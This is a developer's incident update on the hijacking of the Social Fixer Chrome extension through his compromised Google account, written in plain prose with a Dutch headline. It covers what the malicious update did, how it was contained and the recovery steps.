Chrome-extensie voor ontwikkelaars bevatte kortstondig kwaadaardige code

CHROME EXTENSION HACKING UPDATE: First, I apologize for any confusion, inconvenience, and concern that this event has caused. The safety of my users is top priority to me and I take it very seriously. I have worked hard to resolve this quickly and correctly. Below is a detailed technical summary.

TL;DR Summary: The hacked Chrome version of Social Fixer was removed from the Web Store. There is no evidence of any harm done to any users, and there is currently no known risk. Nothing needs to be done by you.

UPDATE! The original extension is now back under my control, and I have published version 20.2.0 on July 5. This is an official release that is safe to install. If you had Social Fixer previously disabled, it may automatically re-enable itself. Otherwise, you may need to re-install from the Chrome Web Store. Thank you to the people at Google for the quick response!

1) My personal Google account was hacked. I have since taken every step possible to secure my account from further threats and I am confident that this cannot happen again. Using my personal account, the attacker was able to update a new version of Social Fixer to the Chrome Web Store and publish it for all users.

2) Chrome auto-updates extensions, so all Chrome users got the updated, hacked extension automatically. The code was completely changed, and required additional permissions that Social Fixer does not. For this reason, it was disabled for all users by default, and users were prompted to accept the new permissions before enabling (a good feature of Chrome!). If you did not accept the new permissions, you were never delivered the updated extension and there was no risk. If you did accept the new permissions, your extension automatically updated with the new code.

3) While the slow Firefox approval process is annoying to me at times, every extension update is reviewed by a human. This is not the case for Google Chrome. Extension updates are automatically approved after some simple automated checks. This allowed the updated extension - which was clearly not legitimate code - to be published without review. This is a limitation of the Chrome process, and could never have happened to the Firefox extension (or Opera or Safari). There is no mechanism in place that would have prevented the publishing of this malicious code.

4) On the morning of July 3, I was alerted by several users that Social Fixer had updated to version 20.1.1 (from the actual published version 20.1.0) and was asking for new permissions. As soon as I heard this, I checked my account and discovered the logins from Russia and the fact that the extension was now under someone else's control. I immediately changed my password, updated my security settings, de-authorized all apps using my credentials, and logged out all sessions. My account is now secured using every available mechanism. I also contacted Google through their official feedback tool and requested that they shut down the extension immediately.

5) Google replied to me within a couple hours to say that my request was received. However, the hacker had changed my gmail settings to prevent me from seeing any emails related to chrome or this extension. I discovered this later in the day and was able to recover the emails that were hidden from me.

6) I inspected the hacker's code inside the updated extension and found nothing that was dangerous to users. Its only purpose was to inject code from a remote server, and the injected code only ran Google Analytics. The end result was that it was keeping track of which sites users visited, but not capturing any private data. This may have just been a preliminary step by the hacker to measure how many users they had access to. There is no indication that the injected code was updated at any time to do anything different.

7) The hacked extension loaded code from unpkg.com using dynamically-generated url's. That site was very helpful in reducing the impact of the threat by updating their code quickly to blacklist the url's being generated. So even if the hijacked extension was installed in your browser, this move prevented it from actually loading any code or doing anything.

After multiple attempts to contact Google through different means, no action had been taken by the afternoon of July 3. I resorted to Twitter to try to get a hold of anyone who could escalate this. I finally reached someone by the evening and was able to have a late-night email exchange with people who work in security with Chrome to start the resolution. I supplied them with a detailed account of what happened.

9) By the morning of July 4, the hacked extension had been disabled in the Chrome Store by Google. No more users can be automatically updated with the bad code, and it is not available for new users. The threat has been fully neutralized.

10) I do not yet have access to my original extension id to update it. This means that I cannot publish an update that automatically gets rolled out to all users. I am hoping that I can retain this extension id so I don't lose all ~200k users or the thousands of positive reviews. The worst case is that I need to release a new version of the extension under a new id, so all Chrome users would need to install from scratch.

11) If you haven't backed up your preferences using the feature built into Social Fixer, then there is no easy way to access them or transfer them to other browsers. Your prefs should not be lost, but they won't be restored unless I can recover the old extension id and publish an update.

12) Just to be clear, no browsers except Chrome (or derivatives that use the Chrome Web Store) were affected by this. No vulnerabilities were exploited in the Social Fixer code or its functionality. The SocialFixer.com web site was not affected. The only security breach was in my personal Google account, which is used to upload extension updates. That has been fully secured, and this type of attack is no longer possible.

13) Social Fixer is not an isolated instance of this kind of hacking. In the past month, other popular extensions such as The Great Suspender, Infinity New Tab, and Betternet have all been victims of similar attacks through the Chrome Store. There is an ongoing coordinated effort to exploit any possible vulnerability in browsers, and extensions seem to be a popular target. This means I need to have even greater diligence in my procedures, which I am prepared to do.

I appreciate all your patience and understanding while I handled this as quickly and thoroughly as possible. I hope that this update gives you more than enough detail to know that I took this very seriously, and that you can trust me personally and the Social Fixer extension going forward. I will always work to protect your security and privacy, while delivering the best functionality I can provide.

I will announce when the safe and updated Chrome extension is once again available.

Thanks again,

Matt Kruse